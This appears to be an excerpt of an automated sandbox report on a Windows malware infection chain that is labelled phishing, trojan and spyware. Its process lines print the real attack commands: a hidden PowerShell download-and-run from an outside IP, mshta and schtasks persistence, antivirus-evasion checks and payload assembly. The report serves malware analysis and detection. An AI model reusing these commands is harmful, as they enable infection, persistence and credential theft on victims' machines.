                                 Source: skotes.exe.11.dr | Static PE information: Section: rtrxnzik ZLIB complexity 0.9944343498734366
                                 Source: random[2].exe.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                 Source: random[2].exe.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                 Source: f891ed3167.exe.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                 Source: f891ed3167.exe.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
                                 Source: random[2].exe0.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                 Source: random[2].exe0.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                 Source: f8e8a2d2f0.exe.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                 Source: f8e8a2d2f0.exe.14.dr | Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
                                 Source: random[1].exe0.14.dr | Static PE information: Section: ndccpyxw ZLIB complexity 0.9944299768518519
                                 Source: 9c1024a1f1.exe.14.dr | Static PE information: Section: ndccpyxw ZLIB complexity 0.9944299768518519
                                 Source: random[1].exe1.14.dr | Static PE information: Section: ZLIB complexity 0.9956691576086957
                                 Source: random[1].exe1.14.dr | Static PE information: Section: gdiknbhi ZLIB complexity 0.994120884735434
                                 Source: 935372fb1f.exe.14.dr | Static PE information: Section: ZLIB complexity 0.9956691576086957
                                 Source: 935372fb1f.exe.14.dr | Static PE information: Section: gdiknbhi ZLIB complexity 0.994120884735434
                                 Source: random[1].exe2.14.dr | Static PE information: Section: .reloc ZLIB complexity 1.002685546875
                                 Source: 7ecb69d7f1.exe.14.dr | Static PE information: Section: .reloc ZLIB complexity 1.002685546875
                                 Source: random[2].exe2.14.dr | Static PE information: Section: ZLIB complexity 0.9960670613354037
                                 Source: random[2].exe2.14.dr | Static PE information: Section: ndmxoxsq ZLIB complexity 0.9939399614726028
                                 Source: c7f37422c5.exe.14.dr | Static PE information: Section: ZLIB complexity 0.9960670613354037
                                 Source: c7f37422c5.exe.14.dr | Static PE information: Section: ndmxoxsq ZLIB complexity 0.9939399614726028
                                 Source: random[2].exe.14.dr, s1l70P8mWLYDmBOs6L.cs | Cryptographic APIs: 'CreateDecryptor'
                                 Source: f891ed3167.exe.14.dr, s1l70P8mWLYDmBOs6L.cs | Cryptographic APIs: 'CreateDecryptor'
                                 Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.cs | Cryptographic APIs: 'CreateDecryptor'
                                 Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.cs | Cryptographic APIs: 'CreateDecryptor'
                                 Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.cs | Cryptographic APIs: 'CreateDecryptor'
                                 Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.cs | Cryptographic APIs: 'CreateDecryptor'
                                 Source: random[2].exe.14.dr, Program.cs | Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                 Source: f891ed3167.exe.14.dr, Program.cs | Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                 Source: random[2].exe0.14.dr, Program.cs | Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                 Source: f8e8a2d2f0.exe.14.dr, Program.cs | Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
                                 Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@86/57@25/7
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009D37B5 GetLastError,FormatMessageW,0_2_009D37B5
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009C10BF AdjustTokenPrivileges,CloseHandle,0_2_009C10BF
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009C16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009C16C3
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009D51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009D51CD
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009EA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_009EA67C
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009D648E CoInitialize,CoCreateInstance,CoUninitialize,0_2_009D648E
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009642A2
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                                 Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6064
                                 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\yBu0GW2G5zAc
                                 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: NULL
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:304:WilStaging_02
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                                 Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4396
                                 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:168:WilStaging_02
                                 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1884:168:WilStaging_02
                                 Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Mutant created: \Sessions\1\BaseNamedObjects\lEoISSVmRadFCSkwWUcz
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:304:WilStaging_02
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:304:WilStaging_02
                                 Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe | Mutant created: \Sessions\1\BaseNamedObjects\MVHEBzjxKloGkPj
                                 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1884:64:WilError_03
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                                 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:64:WilError_03
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:304:WilStaging_02
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
                                 Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:304:WilStaging_02
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | File created: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta
                                 Source: QkRFz2sau5.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                 Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                 Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                 Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                 Source: 9c1024a1f1.exe, 0000000F.00000003.22322252683.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22321854326.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                                 Source: 9c1024a1f1.exe, 0000000F.00000003.22324679118.00000000059E3000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323036090.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323709831.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                 Source: 9c1024a1f1.exe, 0000000F.00000003.22339269544.0000000005AA2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22339655455.00000000059F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                                 Source: QkRFz2sau5.exe | Virustotal: Detection: 54%
                                 Source: QkRFz2sau5.exe | ReversingLabs: Detection: 50%
                                 Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                 Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                 Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                 Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                 Source: unknown | Process created: C:\Users\user\Desktop\QkRFz2sau5.exe "C:\Users\user\Desktop\QkRFz2sau5.exe"
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f
                                 Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f
                                 Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                 Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta
                                 Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                 Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE"
                                 Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                 Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                 Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe"
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe"
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe"
                                 Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                                 Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                 Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                                 Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                 Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
                                 Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe"
                                 Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                 Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Process created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                 Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Process created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 936
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 908
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe"
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe"
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.htaJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE" Jump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
